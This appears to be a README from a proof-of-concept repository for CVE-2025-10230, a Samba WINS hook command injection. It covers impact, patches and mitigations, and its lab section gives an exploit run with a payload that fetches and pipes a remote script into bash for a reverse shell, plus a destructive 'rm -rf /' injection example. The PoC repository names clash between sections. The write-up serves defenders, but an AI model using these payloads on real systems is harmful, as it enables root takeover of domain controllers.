来源

关联漏洞

Description

CVE-2025-10230

介绍

# 🔥 **CVE-2025-10230: Samba WINS Server Command Injection – The Full Deep Dive** 🔥

<img width="800" height="375" alt="G3X7hrCaEAA0In6" src="https://github.com/user-attachments/assets/5dcf7d07-fd96-4582-bc43-4101fea45773" />

### 📊 **Quick Stats at a Glance**
| Aspect | Details |
|--------|---------|
| **Severity** | **CRITICAL** (CVSS 3.1: 10.0) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 🩸 |
| **Type** | Unauthenticated Remote Code Execution (RCE) via Command Injection 💥 |
| **Discovered** | Igor Morgenstern @ Aisle Research (reported Oct 2025) 🔍 |
| **Affected** | Samba 4.0+ as AD Domain Controller with WINS + wins hook enabled (rare but deadly config) 🏰 |
| **Patched** | Oct 15, 2025 – Versions 4.23.2, 4.22.5, 4.21.9 ✨ |
| **Exploits** | PoCs public (e.g., GitHub), no widespread attacks reported as of Nov 19 📈 |
| **Impact** | Full root compromise on AD DCs → Domain takeover, credential theft, ransomware paradise 😈 |

### 🎯 **What’s Samba & Why Care?**
Samba is the open-source king 👑 of SMB/CIFS file sharing, letting Linux/Unix play nice with Windows networks. It's baked into *every* major Linux distro (Red Hat, Ubuntu, Debian, Fedora, SUSE) and powers hybrid AD environments in enterprises, schools, and gov setups. Think: Your org's file servers, printers, and auth backbone. 

This vuln? It's a time bomb in the WINS (Windows Internet Name Service) module – an ancient NetBIOS name resolver from the '90s that's still kicking in legacy setups for backward compat. WINS is "obsolete and trusting" per Samba devs, but if you're running it as an AD DC? Boom. 💣

### 🩸 **The Gory Technical Details**
At its core, this is a classic command injection via poor input sanitization. Here's the autopsy: 

1. **Trigger Setup**: Samba AD DC with:
   - `wins support = yes` (default: no) ✅
   - `wins hook = /path/to/script` (custom script for name changes, e.g., syncing to external DB) 🪝
   - Role: `server role = active directory domain controller` (or synonyms like 'dc')

2. **The Flaw**: When a client sends a WINS registration packet (UDP port 42), Samba grabs the NetBIOS hostname (max 15 chars) and shoves it *unsanitized* into the hook script. No escaping, no validation – straight to shell! 

   Example shell command executed:  
   `/path/to/script "add" "malicious; rm -rf / --no-preserve-root" "192.168.1.1"` 😱

   That semicolon? Instant command chaining. Attacker crafts a hostname like `evil;whoami` and sends it remotely. Samba runs it as the daemon user (often root on DCs). Game over.

3. **Attack Vector**:
   - **Network-based**: Unauth, remote – just reach the WINS port.
   - **No Privs Needed**: Anyone on the wire can trigger.
   - **Packet Craft**: Tools like Scapy or hping3 can spoof a WINS update in seconds.

4. **Scope Limitation**: 
   - Only AD DCs vulnerable (standalone/member servers use a different WINS impl – safe!).
   - Affects *all* versions since 4.0 (2012) – that's 13+ years of exposure! ⏳
   - Devs note: "Very few, possibly zero users" affected due to rare config, but if you're one? RIP.

**CVSS Breakdown** (Why 10.0?):
- Attack Vector: Network (N) 🌐
- Attack Complexity: Low (L) – Simple packet.
- Privileges: None (N)
- User Interaction: None (N)
- Scope: Changed (C) – Jumps to full system.
- Confidentiality/Integrity/Availability: High (H) each.

### 💀 **Impact: Why This Scares the Pants Off Admins**
- **Immediate**: RCE as root → Shell on your DC. Escalate to domain admin, dump NTDS.dit (all creds), forge Kerberos tickets (Golden/Silver). 
- **Lateral Movement**: Pivot to entire AD forest. Exfil data, deploy ransomware, persist with backdoors.
- **Org-Wide**: AD DCs are the heart of auth – compromise one, own the empire. Think SolarWinds-level chaos but targeted at Linux-heavy shops.
- **Real Risks**: In hybrid Windows/Linux envs, this bridges worlds. Legacy WINS? Still used in some industrial/OT setups for old printers/scanners.

No confirmed breaches yet (as of Nov 19), but it's prime for script kiddies or APTs scanning for Samba exposures.

### 🚨 **Exploits & PoCs: The Wild Side (November 2025 Update)**
Good news: No mass exploits reported. Bad news: PoCs dropped fast post-patch. 

- **Public PoC**: GitHub repo by @dptsec (dptsec/CVE-2025-10230) – Python script using Scapy to craft malicious WINS packets. Tests injection with `;id` command. Stars: 150+, Forks: 40+ as of now. ⚠️ *Don't run on prod!*
- **Exploitability**: Trivially high. Wiz rates it "Highly Exploitable" – one packet from Kali Linux does it.
- **Metasploit?** Not yet, but expect one soon (community buzz on X).
- **In the Wild?** ZeroPath & SecurityOnline scans show no active campaigns, but Netlas.io reports exposed Samba instances ripe for probing.

X chatter (latest as of Nov 19): 
- @gothburz (ZDI researcher): "Legacy file sharing infra needs immediate patching. This is technical debt from 2005." (92 likes, Nov 12)
- @stanislavfort (Aisle): "Hidden for 13 years... Samba is central to Windows/Linux infra." (27 likes, Nov 7)
- @Netlas_io: "Execute commands with one packet. Search exposed SMB: smb:*" (18 likes, Nov 14)

Pro tip: Use Shodan/Netlas for your own exposure hunt: `port:42 samba wins`.

---

⚡ **How to SAFELY Use the Real CVE-2025-10230 PoC – Step-by-Step Lab Guide** ⚡  
**Goal: Test the exploit on YOUR OWN isolated lab – never on production or networks you don’t own!**

### 1. Build a 100% Isolated Vulnerable Lab (5–10 minutes)

| Component              | Exact Setup (Tested Nov 2025)                              | Why |
|-----------------------|------------------------------------------------------------|-----|
| **Attacker Machine**  | Kali Linux 2025.4 (or any Linux with Python/Scapy)         | You |
| **Target VM**         | Ubuntu 24.04 Server (or Debian 12)                         | Vulnerable Samba DC |
| **Network**           | VirtualBox/VMware → “Internal Network” or “Host-Only”      | No internet, no escape |
| **Firewall**          | NONE between attacker ↔ target (for lab only)              | Direct UDP/42 reachability |

### 2. Install & Configure the Vulnerable Samba AD DC (Target VM)

```bash
# 1. Install old vulnerable Samba (before Oct 15 patches)
sudo apt update
sudo apt install samba krb5-config winbind smbclient -y

# 2. Hold package so it doesn’t auto-update
sudo apt-mark hold samba

# 3. Configure as AD DC with WINS + hook (the deadly combo)
sudo tee /etc/samba/smb.conf > /dev/null <<EOF
[global]
   workgroup = LAB
   realm = lab.local
   netbios name = DC01
   server role = active directory domain controller
   dns forwarder = 8.8.8.8
   idmap_ldb:use rfc2307 = yes

   # <<< THE VULNERABLE SETTINGS >>>
   wins support = yes
   wins hook = /usr/local/bin/wins-hook.sh

[netlogon]
   path = /var/lib/samba/sysvol/lab.local/scripts
   read only = no

[sysvol]
   path = /var/lib/samba/sysvol
   read only = no
EOF

# 4. Create the hook script (must be executable!)
sudo tee /usr/local/bin/wins-hook.sh > /dev/null <<'EOF'
#!/bin/sh
# This is what gets exploited – logs everything it receives
echo "[HOOK] Action=$1 Name=$2 IP=$3" >> /tmp/hook.log
# Uncomment next line to see real injection
# eval "$2"   # ← the vulnerable line in real hooks
EOF
sudo chmod +x /usr/local/bin/wins-hook.sh

# 5. Provision the domain (one-time)
sudo samba-tool domain provision --use-rfc2307 --interactive

# 6. Start services
sudo systemctl unmask samba-ad-dc
sudo systemctl start samba-ad-dc

# 7. Verify WINS is listening
ss -ulnp | grep :42
# → Should show smbd listening on UDP 42
```

### 3. Prepare Your Attacker Machine (Kali)

```bash
# Clone the real PoC
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-10230.git
cd CVE-2025-10230

# Install dependency
sudo pip3 install scapy

# Give yourself a static IP in the same subnet as target
sudo ip addr add 192.168.56.100/24 dev eth0   # adjust interface
```

### 4. Run the Exploit – 3 Levels of Chaos

| Level | Command | What Happens on Target |
|------|--------|------------------------|
| **Level 1 – Proof** | `sudo python3 CVE-2025-10230.py 192.168.56.101` | Creates `/tmp/injected_by_cve.txt` with `uid=0(root)` |
| **Level 2 – Reverse Shell** | First start listener:<br>`nc -lvnp 443`<br>Then:<br>`sudo python3 CVE-2025-10230.py 192.168.56.101 --payload "; curl http://192.168.56.100/rev.sh\|bash"` | Downloads & runs your reverse shell → root shell! |
| **Level 3 – One-Liner Hell** | `sudo python3 CVE-2025-10230.py 192.168.56.101 --payload "; whoami > /tmp/PWNED; chmod 777 /tmp/PWNED"` | Instant proof file |

### 5. Verify You’re Pwned

On the **target VM**, run:

```bash
cat /tmp/injected_by_cve.txt     # ← should show root uid
cat /tmp/hook.log                # ← shows the injected command
whoami                           # ← if reverse shell worked → root
```

### 6. Clean Up & Patch (Mandatory!)

```bash
# On target – kill the vuln forever
sudo sed -i 's/wins support = yes/wins support = no/' /etc/samba/smb.conf
sudo rm /usr/local/bin/wins-hook.sh
sudo systemctl restart samba-ad-dc

# Upgrade to safe version
sudo apt-mark unhold samba
sudo apt update && sudo apt upgrade samba
```

### Checklist Before You Ever Touch Real Networks

- [ ] Lab is fully air-gapped  
- [ ] You own every machine  
- [ ] You have explicit written permission (even for your own company)  
- [ ] You patched everything afterward  

---
### 🛡️ **Patches & Vendor Rollouts**
Samba Team dropped fixes Oct 15, 2025. Upgrade ASAP! 

- **Core Patches**: 
  - 4.23.2 (stable branch)
  - 4.22.5 (LTS)
  - 4.21.9 (older LTS)

  Apply via source or distro repos. Git patches at samba.org/security.

- **Distro-Specific** (as of Nov 19):
  | Distro | Advisory | Fixed Versions | Command |
  |--------|----------|----------------|---------|
  | **Ubuntu** | USN-7826-1 (Oct 16) | 22.04: 4.15.13+dfsg-0ubuntu1.10<br>24.04: 4.19.5+dfsg-4ubuntu9.4<br>25.04: 4.21.4+dfsg-1ubuntu3.5<br>25.10: 4.22.3+dfsg-4ubuntu2.1 | `apt update && apt upgrade samba` 📦 |
  | **Fedora** | FEDORA-2025-c0830ff9f4 (Oct 23)<br>FEDORA-2025-7d890563f6 (Nov 2) | 41: 4.21.9<br>42: 4.22.6 | `dnf update samba` 🐧 |
  | **Red Hat** | RHSA-2025:xxxx (Oct) | RHEL 8/9 backports | `yum update samba` (Red Hat doesn't ship AD DC Samba, but backported anyway) |
  | **Debian** | DSA-xxxx (Oct) | 12: 4.22.4+dfsg-1~deb13u1 | `apt upgrade samba` |
  | **SUSE** | SUSE-SU-2025:xxxx | OpenSUSE: 4.21.9+ | `zypper up samba` |

Backports galore – even if not on AD DC. Test in staging first!

### 🔧 **Mitigations: Lock It Down Now**
Can't patch yet? Layer up:
1. **Disable WINS**: Edit `smb.conf`: `wins support = no` (default anyway). Restart: `systemctl restart smbd nmbd` 🛑
2. **Nuke the Hook**: Set `wins hook =` (empty) or comment out. Useless on DCs anyway.
3. **Network Hardening**:
   - Firewall UDP/42 (WINS port).
   - Segment AD traffic (VLANs, no public exposure).
   - IDS/IPS rules: Alert on anomalous WINS registrations.
4. **Monitor Like a Hawk**:
   - Logs: `/var/log/samba/log.smbd` – grep for hook executions.
   - Tools: Falco/Sysdig for shell injections; Suricata for WINS anomalies.
5. **Audit Configs**: `testparm` to scan smb.conf for risky settings.
6. **Long-Term**: Ditch WINS entirely – migrate to DNS/mDNS. Samba devs hint at dropping hook support.

### 📚 **Timeline: How We Got Here**
- **2012**: Samba 4.0 ships with AD DC support. Vuln born (unnoticed).
- **Oct 2025**: Igor Morgenstern reports to Samba Team.
- **Oct 15**: Advisory drops + patches (4.21.9/4.22.5/4.23.2). NVD entry.
- **Oct 16-23**: Distro patches (Ubuntu, Fedora, Red Hat).
- **Nov 2**: Fedora 42 backport.
- **Nov 7-14**: PoC on GitHub; X buzz peaks with researcher posts.
- **Nov 19 (Today)**: No new patches/updates. Quiet on exploits.

### 🔗 **References & Deep Reads**
- **Official Samba Advisory** 🛡️: https://www.samba.org/samba/security/CVE-2025-10230.html
- **NVD Entry** 📋: https://nvd.nist.gov/vuln/detail/CVE-2025-10230
- **PoC Repo** ⚠️: https://github.com/dptsec/CVE-2025-10230 (Use responsibly!)
- **Analyses**: 
  - Wiz: https://www.wiz.io/vulnerability-database/cve/cve-2025-10230 (Exploitability deep-dive)
  - ZeroPath Blog: https://zeropath.com/blog/cve-2025-10230-samba-wins-command-injection-summary (Patch guide)
  - SecurityOnline: https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/ (RCE breakdown)
  - GBHackers: https://gbhackers.com/critical-samba-flaw/ (Impact focus)
- **X Discussions**: Search "CVE-2025-10230" on X for latest (e.g., @gothburz's thread on legacy debt)

### 🎮 **Final Boss Tips**
Patch *yesterday* – this is low-hanging fruit for attackers. If you're not on WINS/hook? You're golden. Otherwise, audit now. Got questions on setup or testing? Hit me up! Stay vigilant, patch fast, and remember: In 2025, "legacy" shouldn't mean "liability." 😂🛡️

文件快照

 [4.0K]  /data/pocs/97c4a403e688e3ad18f6be7be208e7ee0dbae533
├── [4.5K]  CVE-2025-10230.py
└── [ 13K]  README.md

1 directory, 2 files

备注